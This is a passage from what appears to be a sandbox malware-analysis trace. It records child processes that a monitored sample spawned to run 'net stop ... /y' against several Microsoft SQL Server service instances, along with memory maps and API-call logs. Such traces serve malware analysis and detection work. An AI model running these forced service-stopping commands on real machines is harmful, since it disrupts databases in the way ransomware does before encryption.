"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7632 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7633 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7634 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7635 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 7636 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7637 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7638 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7639 start_va = 0xff970000 end_va = 0xff9a2fff entry_point = 0xff970000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 7640 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7641 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7642 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 7643 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7644 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 7645 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7646 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7720 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7721 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7722 start_va = 0x130000 end_va = 0x196fff entry_point = 0x130000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7723 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 7724 start_va = 0x440000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 7725 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7726 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7727 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 7728 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 7729 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 7730 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7731 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7732 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7733 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 7734 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 7735 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 7736 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7737 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7738 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7739 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7740 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7741 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7742 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7746 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 633 os_tid = 0xbe8 [0103.485] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fef0 | out: lpSystemTimeAsFileTime=0x12fef0*(dwLowDateTime=0xf2d98450, dwHighDateTime=0x1d48689)) [0103.486] GetCurrentProcessId () returned 0x1348 [0103.486] GetCurrentThreadId () returned 0xbe8 [0103.486] GetTickCount () returned 0x23a22 [0103.486] QueryPerformanceCounter (in: lpPerformanceCount=0x12fef8 | out: lpPerformanceCount=0x12fef8*=1815040400000) returned 1 [0103.487] GetModuleHandleW (lpModuleName=0x0) returned 0xff970000 [0103.487] __set_app_type (_Type=0x1) [0103.487] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff989c9c) returned 0x0 [0103.487] __getmainargs (in: _Argc=0xff994780, _Argv=0xff994790, _Env=0xff994788, _DoWildCard=0, _StartInfo=0xff99479c | out: _Argc=0xff994780, _Argv=0xff994790, _Env=0xff994788) returned 0 [0103.488] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0103.488] GetConsoleOutputCP () returned 0x1b5 [0103.491] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff99cec0 | out: lpCPInfo=0xff99cec0) returned 1 [0103.491] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0103.496] sprintf_s (in: _DstBuf=0x12fe98, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0103.496] setlocale (category=0, locale=".437") returned="English_United States.437" [0103.511] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.511] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0103.511] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SBSMONITORING /y" [0103.511] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fc30, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0103.511] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0103.512] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12fe88 | out: Buffer=0x12fe88*=0x264d60) returned 0x0 [0103.512] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12fe88 | out: Buffer=0x12fe88*=0x26c130) returned 0x0 [0103.512] _fileno (_File=0x7fefdba2a80) returned 0 [0103.512] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0103.512] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0103.512] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0103.512] _wcsicmp (_String1="config", _String2="stop") returned -16 [0103.512] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0103.512] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0103.512] _wcsicmp (_String1="file", _String2="stop") returned -13 [0103.512] _wcsicmp (_String1="files", _String2="stop") returned -13 [0103.512] _wcsicmp (_String1="group", _String2="stop") returned -12 [0103.512] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0103.512] _wcsicmp (_String1="help", _String2="stop") returned -11 [0103.512] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0103.512] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0103.512] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0103.512] _wcsicmp (_String1="session", _String2="stop") returned -15 [0103.512] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0103.512] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0103.512] _wcsicmp (_String1="share", _String2="stop") returned -12 [0103.512] _wcsicmp (_String1="start", _String2="stop") returned -14 [0103.513] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0103.513] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0103.513] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0103.513] _wcsicmp (_String1="accounts", _String2="MSSQL$SBSMONITORING") returned -12 [0103.513] _wcsicmp (_String1="computer", _String2="MSSQL$SBSMONITORING") returned -10 [0103.513] _wcsicmp (_String1="config", _String2="MSSQL$SBSMONITORING") returned -10 [0103.513] _wcsicmp (_String1="continue", _String2="MSSQL$SBSMONITORING") returned -10 [0103.513] _wcsicmp (_String1="cont", _String2="MSSQL$SBSMONITORING") returned -10 [0103.513] _wcsicmp (_String1="file", _String2="MSSQL$SBSMONITORING") returned -7 [0103.513] _wcsicmp (_String1="files", _String2="MSSQL$SBSMONITORING") returned -7 [0103.513] _wcsicmp (_String1="group", _String2="MSSQL$SBSMONITORING") returned -6 [0103.513] _wcsicmp (_String1="groups", _String2="MSSQL$SBSMONITORING") returned -6 [0103.513] _wcsicmp (_String1="help", _String2="MSSQL$SBSMONITORING") returned -5 [0103.513] _wcsicmp (_String1="helpmsg", _String2="MSSQL$SBSMONITORING") returned -5 [0103.513] _wcsicmp (_String1="localgroup", _String2="MSSQL$SBSMONITORING") returned -1 [0103.513] _wcsicmp (_String1="pause", _String2="MSSQL$SBSMONITORING") returned 3 [0103.513] _wcsicmp (_String1="session", _String2="MSSQL$SBSMONITORING") returned 6 [0103.513] _wcsicmp (_String1="sessions", _String2="MSSQL$SBSMONITORING") returned 6 [0103.513] _wcsicmp (_String1="sess", _String2="MSSQL$SBSMONITORING") returned 6 [0103.513] _wcsicmp (_String1="share", _String2="MSSQL$SBSMONITORING") returned 6 [0103.513] _wcsicmp (_String1="start", _String2="MSSQL$SBSMONITORING") returned 6 [0103.513] _wcsicmp (_String1="stats", _String2="MSSQL$SBSMONITORING") returned 6 [0103.513] _wcsicmp (_String1="statistics", _String2="MSSQL$SBSMONITORING") returned 6 [0103.513] _wcsicmp (_String1="stop", _String2="MSSQL$SBSMONITORING") returned 6 [0103.513] _wcsicmp (_String1="time", _String2="MSSQL$SBSMONITORING") returned 7 [0103.513] _wcsicmp (_String1="user", _String2="MSSQL$SBSMONITORING") returned 8 [0103.513] _wcsicmp (_String1="users", _String2="MSSQL$SBSMONITORING") returned 8 [0103.513] _wcsicmp (_String1="msg", _String2="MSSQL$SBSMONITORING") returned -12 [0103.513] _wcsicmp (_String1="messenger", _String2="MSSQL$SBSMONITORING") returned -14 [0103.513] _wcsicmp (_String1="receiver", _String2="MSSQL$SBSMONITORING") returned 5 [0103.513] _wcsicmp (_String1="rcv", _String2="MSSQL$SBSMONITORING") returned 5 [0103.513] _wcsicmp (_String1="netpopup", _String2="MSSQL$SBSMONITORING") returned 1 [0103.514] _wcsicmp (_String1="redirector", _String2="MSSQL$SBSMONITORING") returned 5 [0103.514] _wcsicmp (_String1="redir", _String2="MSSQL$SBSMONITORING") returned 5 [0103.514] _wcsicmp (_String1="rdr", _String2="MSSQL$SBSMONITORING") returned 5 [0103.514] _wcsicmp (_String1="workstation", _String2="MSSQL$SBSMONITORING") returned 10 [0103.514] _wcsicmp (_String1="work", _String2="MSSQL$SBSMONITORING") returned 10 [0103.514] _wcsicmp (_String1="wksta", _String2="MSSQL$SBSMONITORING") returned 10 [0103.514] _wcsicmp (_String1="prdr", _String2="MSSQL$SBSMONITORING") returned 3 [0103.514] _wcsicmp (_String1="devrdr", _String2="MSSQL$SBSMONITORING") returned -9 [0103.514] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SBSMONITORING") returned -1 [0103.514] _wcsicmp (_String1="server", _String2="MSSQL$SBSMONITORING") returned 6 [0103.514] _wcsicmp (_String1="svr", _String2="MSSQL$SBSMONITORING") returned 6 [0103.514] _wcsicmp (_String1="srv", _String2="MSSQL$SBSMONITORING") returned 6 [0103.514] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SBSMONITORING") returned -1 [0103.514] _wcsicmp (_String1="alerter", _String2="MSSQL$SBSMONITORING") returned -12 [0103.514] _wcsicmp (_String1="netlogon", _String2="MSSQL$SBSMONITORING") returned 1 [0103.514] _wcsupr (in: _String="MSSQL$SBSMONITORING" | out: _String="MSSQL$SBSMONITORING") returned="MSSQL$SBSMONITORING" [0103.514] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x26ce40 [0103.607] GetServiceKeyNameW (in: hSCManager=0x26ce40, lpDisplayName="MSSQL$SBSMONITORING", lpServiceName=0xff995750, lpcchBuffer=0x12fda8 | out: lpServiceName="", lpcchBuffer=0x12fda8) returned 0 [0103.608] _wcsicmp (_String1="msg", _String2="MSSQL$SBSMONITORING") returned -12 [0103.609] _wcsicmp (_String1="messenger", _String2="MSSQL$SBSMONITORING") returned -14 [0103.609] _wcsicmp (_String1="receiver", _String2="MSSQL$SBSMONITORING") returned 5 [0103.609] _wcsicmp (_String1="rcv", _String2="MSSQL$SBSMONITORING") returned 5 [0103.609] _wcsicmp (_String1="redirector", _String2="MSSQL$SBSMONITORING") returned 5 [0103.609] _wcsicmp (_String1="redir", _String2="MSSQL$SBSMONITORING") returned 5 [0103.609] _wcsicmp (_String1="rdr", _String2="MSSQL$SBSMONITORING") returned 5 [0103.609] _wcsicmp (_String1="workstation", _String2="MSSQL$SBSMONITORING") returned 10 [0103.609] _wcsicmp (_String1="work", _String2="MSSQL$SBSMONITORING") returned 10 [0103.609] _wcsicmp (_String1="wksta", _String2="MSSQL$SBSMONITORING") returned 10 [0103.609] _wcsicmp (_String1="prdr", _String2="MSSQL$SBSMONITORING") returned 3 [0103.609] _wcsicmp (_String1="devrdr", _String2="MSSQL$SBSMONITORING") returned -9 [0103.609] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SBSMONITORING") returned -1 [0103.609] _wcsicmp (_String1="server", _String2="MSSQL$SBSMONITORING") returned 6 [0103.609] _wcsicmp (_String1="svr", _String2="MSSQL$SBSMONITORING") returned 6 [0103.609] _wcsicmp (_String1="srv", _String2="MSSQL$SBSMONITORING") returned 6 [0103.609] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SBSMONITORING") returned -1 [0103.609] _wcsicmp (_String1="alerter", _String2="MSSQL$SBSMONITORING") returned -12 [0103.609] _wcsicmp (_String1="netlogon", _String2="MSSQL$SBSMONITORING") returned 1 [0103.609] NetServiceControl (in: servername=0x0, service="MSSQL$SBSMONITORING", opcode=0x0, arg=0x0, bufptr=0x12fdb0 | out: bufptr=0x12fdb0) returned 0x889 [0103.610] wcscpy_s (in: _Destination=0xff9980d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0103.610] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0103.611] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff995b50, nSize=0x800, Arguments=0xff997f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0103.613] GetFileType (hFile=0xb) returned 0x2 [0103.613] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12fc78 | out: lpMode=0x12fc78) returned 1 [0103.613] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff995b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x12fc70, lpReserved=0x0 | out: lpBuffer=0xff995b50*, lpNumberOfCharsWritten=0x12fc70*=0x1e) returned 1 [0103.614] GetFileType (hFile=0xb) returned 0x2 [0103.614] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12fc78 | out: lpMode=0x12fc78) returned 1 [0103.614] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff971efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12fc70, lpReserved=0x0 | out: lpBuffer=0xff971efc*, lpNumberOfCharsWritten=0x12fc70*=0x2) returned 1 [0103.615] _ultow (in: _Dest=0x889, _Radix=1244384 | out: _Dest=0x889) returned="2185" [0103.615] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff995b50, nSize=0x800, Arguments=0xff997f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0103.615] GetFileType (hFile=0xb) returned 0x2 [0103.615] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12fc78 | out: lpMode=0x12fc78) returned 1 [0103.616] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff995b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x12fc70, lpReserved=0x0 | out: lpBuffer=0xff995b50*, lpNumberOfCharsWritten=0x12fc70*=0x34) returned 1 [0103.616] GetFileType (hFile=0xb) returned 0x2 [0103.616] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12fc78 | out: lpMode=0x12fc78) returned 1 [0103.616] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff971efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12fc70, lpReserved=0x0 | out: lpBuffer=0xff971efc*, lpNumberOfCharsWritten=0x12fc70*=0x2) returned 1 [0103.617] NetApiBufferFree (Buffer=0x264d60) returned 0x0 [0103.617] NetApiBufferFree (Buffer=0x26c130) returned 0x0 [0103.617] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SBSMONITORING /y" [0103.617] exit (_Code=2) Process: id = "190" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x58f85000" os_pid = "0x1350" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQL$SYSTEM_BGC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7747 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7748 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7749 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7750 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 7751 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7752 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7753 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7754 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 7755 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7756 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7757 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 7758 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7759 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 7760 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7761 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 634 os_tid = 0xc5c Process: id = "191" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5b0a6000" os_pid = "0xc58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MSSQL$TPS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7762 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7763 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7764 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7765 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 7766 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7767 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7768 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7769 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 7770 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7771 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7772 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 7773 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7774 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 7775 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7776 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 636 os_tid = 0x1358 Process: id = "192" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x59795000" os_pid = "0xa88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "185" os_parent_pid = "0x1200" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$SQL_2008 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7797 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = 